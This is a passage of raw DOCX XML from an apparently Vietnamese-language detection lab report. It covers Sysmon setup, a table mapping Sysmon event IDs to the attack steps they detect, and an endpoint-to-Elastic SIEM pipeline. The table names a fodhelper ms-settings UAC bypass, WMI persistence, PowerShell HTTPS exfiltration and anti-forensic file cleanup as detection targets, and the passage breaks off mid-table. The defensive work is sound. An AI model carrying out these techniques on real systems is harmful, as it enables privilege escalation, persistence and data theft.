          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Applications and Services Logs &gt; Microsoft &gt; Windows &gt; Sysmon &gt; Operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8972F" w14:textId="77777777" w:rsidR="00454EEB" w:rsidRDefault="00454EEB" w:rsidP="00454EEB">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00454EEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BF3CDEA" wp14:editId="6511E15E">
            <wp:extent cx="6120130" cy="2785745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172450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05836" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2785745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C67B58F" w14:textId="1ED44EBC" w:rsidR="00B01B4A" w:rsidRDefault="00454EEB" w:rsidP="00454EEB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r w:rsidRPr="00B613E0">
        <w:t>Giao diện Sysmon64 sau khi cài đặt thành công</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B34788" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 EventID Coverage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1"/>
        <w:gridCol w:w="2585"/>
        <w:gridCol w:w="3078"/>
        <w:gridCol w:w="1429"/>
        <w:gridCol w:w="1243"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4E901567" w14:textId="77777777">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12CC1DB4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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3B9C3F15" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Event Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3606"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742CE769" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lý do thu thập</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500"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79B69EBA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400"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6DF441E0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5DCDE3B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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891E0F8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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F7047AF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessCreate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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17AEA40" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện fodhelper, WmiPrvSE chain, discovery binaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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37985C0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exclude conhost.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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80CCAD3" w14:textId="12536E85" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1, C3, S1-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="13287B71" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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EA5758A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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C9B005A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NetworkConnect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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1697901" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện PS/SYSTEM outbound HTTPS — exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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653DC07" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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A2CC905" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4, C5, S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="60E23E0E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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314617D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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FECBE2C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FileCreate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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8485596" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện file staging trong Temp, zip creation — BẮT BUỘC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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A08066D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Include staging paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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0EB6083" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="32B7D0E7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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2738F54" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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064E7292" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RegistryValueSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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0A8DF17B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện ms-settings registry hijack — UAC bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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0275B622" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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8D8DD89" w14:textId="5706B7EE" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="16E19699" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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0D5E956" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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96563A8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WmiEventFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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1ACEE97" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Filter creation — persistence step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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249C010" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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25A2245" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="33E33100" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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75B23C7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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E786BFA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WmiEventConsumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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5CD311C3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Consumer creation — persistence step 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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85D4BAB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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E2CB331" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6DFB2060" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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DDB8A71" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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A5AE8CA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WmiEventConsumerToFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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CA1821E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Binding — persistence LIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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B09B8F4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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F092C74" w14:textId="4F9CC754" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3456D679" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="72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5615F298" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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3088477" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FileDelete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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8CE9B81" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phát hiện cleanup sau exfil — anti-forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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9306846" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Include Temp + exts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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11D190C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="026EB621" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8BAE1C" w14:textId="77777777" w:rsidR="004B4A29" w:rsidRDefault="004B4A29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F462EC3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>V. PIPELINE LOG — LUỒNG DỮ LIỆU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CB3A0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Tổng Quan Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503D138" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Luồng dữ liệu từ endpoint đến SIEM alert tuân theo chuỗi thu thập — chuẩn hóa — phân tích — cảnh báo. Mỗi bước trong pipeline có vai trò cụ thể và đảm bảo tính toàn vẹn của dữ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01B4A" w14:paraId="0325C012"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2E7E5837" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thành phần</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6826"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400B0E06" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="50E59D4A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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A461561" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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DAF15D6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thực thi attack chain: powershell, reg.exe, fodhelper, curl.exe, notepad.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7AC63FB9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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3D004F7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon v15.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682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E5B2C7B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thu thập telemetry chi tiết: command line, hash, network, registry, WMI events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="10F8F4FC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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287A2A1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows Event Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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876CF3B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Buffer sự kiện trong channel Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="6A8C3E2F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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9DB2643" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elastic Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682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757B374" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đọc Event Log, chuẩn hóa sang ECS (Elastic Common Schema), gửi HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="250B9587" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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13A7122" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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A12F9F2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Index vào data stream logs-windows.sysmon_operational-default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="152878E0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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8742300" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detection Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682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A6F915D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Chạy EQL rules mỗi 1 phút, evaluate sequence logic và timing constraints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0575F2D0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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CB1E5EB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alert System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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FCE3938" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tạo alert document trong .alerts-security.alerts-default</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2AB72282" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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8F0C465" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Webhook Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
